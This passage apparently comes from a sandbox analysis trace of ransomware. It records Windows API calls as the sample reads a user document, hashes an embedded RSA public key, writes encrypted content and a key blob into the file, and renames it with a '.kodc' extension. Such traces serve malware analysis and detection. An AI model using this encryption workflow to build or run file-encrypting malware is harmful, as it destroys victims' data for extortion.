dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0098.044] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=67328) returned 1 [0098.044] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0098.048] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x106da, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.048] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0098.048] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.049] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.049] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.049] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x10700, lpOverlapped=0x0) returned 1 [0098.049] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.049] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0098.049] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.049] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.049] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x692d18) returned 1 [0098.050] CryptCreateHash (in: hProv=0x692d18, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0098.050] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0098.050] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0098.050] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0098.050] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0098.050] GetLastError () returned 0x0 [0098.050] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0098.050] CryptReleaseContext (hProv=0x692d18, dwFlags=0x0) returned 1 [0098.050] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.050] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0098.051] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0098.051] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.051] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0098.051] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.051] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.051] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10700) returned 0x9ba4d90 [0098.051] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0098.051] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.051] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0098.051] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.051] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0098.051] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0098.051] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x33403c8 [0098.051] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a7f0 [0098.051] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x3340410 [0098.051] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a808 [0098.052] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a838 [0098.052] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0098.052] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a850 [0098.052] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0098.052] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0098.052] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32d0958 [0098.052] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0098.052] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a838 | out: hHeap=0x630000) returned 1 [0098.052] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a850 | out: hHeap=0x630000) returned 1 [0098.052] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0098.052] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0098.052] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0098.052] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0098.052] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec00 [0098.052] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a850 [0098.052] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0098.052] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331a838 [0098.052] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec10 [0098.052] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c428 [0098.052] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0098.052] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0098.052] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0098.052] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c540 [0098.053] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0098.053] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0098.053] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0098.053] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a850 | out: hHeap=0x630000) returned 1 [0098.053] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.053] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a838 | out: hHeap=0x630000) returned 1 [0098.053] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0098.053] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0098.053] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0098.053] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0098.053] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0098.053] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0098.053] GetCurrentThreadId () returned 0x42c [0098.053] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0098.053] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x696968 [0098.053] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0098.053] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0098.053] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0098.053] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0098.053] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.053] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0098.053] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.053] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.053] GetCurrentThreadId () returned 0x42c [0098.053] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.054] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.054] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0098.054] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.054] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.054] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.054] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.054] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0098.054] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0098.054] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0098.054] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318ea0 [0098.054] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0098.054] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0098.054] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0098.054] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0098.054] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.054] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0098.054] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0098.054] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0098.054] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0098.054] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0098.054] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0098.054] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.054] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a838 [0098.054] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0098.055] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0098.055] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.055] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0098.055] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0098.055] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0098.055] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0098.055] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a850 [0098.055] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0098.055] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0098.055] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0098.055] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a820 [0098.055] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0098.055] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0098.055] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.055] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0098.055] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0098.055] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0098.055] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0098.055] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a868 [0098.055] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0098.056] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a5b0 [0098.056] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0098.056] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0098.056] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0098.056] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0098.056] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0098.056] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0098.056] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a838 | out: hHeap=0x630000) returned 1 [0098.056] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a838 [0098.056] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0098.056] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0098.056] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0098.056] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c428 [0098.056] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0098.056] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32d0958 [0098.056] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0098.056] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c658 [0098.056] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0098.056] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c770 [0098.056] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a838 | out: hHeap=0x630000) returned 1 [0098.057] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x32cef08 [0098.057] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0098.057] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0098.057] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.057] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x692d18 | out: hHeap=0x630000) returned 1 [0098.057] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0098.057] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0098.057] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0098.057] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0098.057] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0098.057] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0098.057] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0098.057] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0098.057] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a868 | out: hHeap=0x630000) returned 1 [0098.057] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.057] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0098.057] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0098.057] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a850 | out: hHeap=0x630000) returned 1 [0098.058] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a820 | out: hHeap=0x630000) returned 1 [0098.058] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0098.058] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0098.058] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0098.058] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a808 | out: hHeap=0x630000) returned 1 [0098.058] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3340410 | out: hHeap=0x630000) returned 1 [0098.058] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0098.058] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0098.058] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318ea0 | out: hHeap=0x630000) returned 1 [0098.058] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0098.058] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0098.058] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0098.058] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0098.058] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0098.058] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.058] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.058] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0098.058] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba4d90*, nNumberOfBytesToWrite=0x106fb, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba4d90*, lpNumberOfBytesWritten=0x9e2fb14*=0x106fb, lpOverlapped=0x0) returned 1 [0098.059] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba4d90 | out: hHeap=0x630000) returned 1 [0098.059] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x10700, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.059] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0098.059] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0098.059] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0098.059] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x333b018 [0098.059] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333b018, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0098.059] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333a888 [0098.059] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0098.059] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0098.059] WriteFile (in: hFile=0x5cc, lpBuffer=0x333a888*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333a888*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0098.059] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0098.059] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0098.059] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0098.060] CloseHandle (hObject=0x5cc) returned 1 [0098.061] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x32c2cb0 [0098.061] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x880) returned 0x32d0db8 [0098.061] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32c2cb0 | out: hHeap=0x630000) returned 1 [0098.062] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6JU8bcP.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\6ju8bcp.rtf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6JU8bcP.rtf.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\6ju8bcp.rtf.kodc")) returned 1 [0098.062] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0098.062] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.062] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.064] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c0 | out: hHeap=0x630000) returned 1 [0098.064] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5025e30, ftCreationTime.dwHighDateTime=0x1d5c0e6, ftLastAccessTime.dwLowDateTime=0x4e339d60, ftLastAccessTime.dwHighDateTime=0x1d5c22d, ftLastWriteTime.dwLowDateTime=0x4e339d60, ftLastWriteTime.dwHighDateTime=0x1d5c22d, 